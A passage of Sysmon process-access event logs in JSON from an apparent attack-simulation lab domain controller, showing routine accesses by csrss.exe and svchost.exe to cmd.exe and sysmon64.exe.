Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1799,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-0010A1B50300}\r\nTargetProcessId: 8\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-0010A1B50300}","TargetProcessId":"8","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1800,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1801,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1802,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1803,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1804,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1805,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1806,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.391","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1807,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.391\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 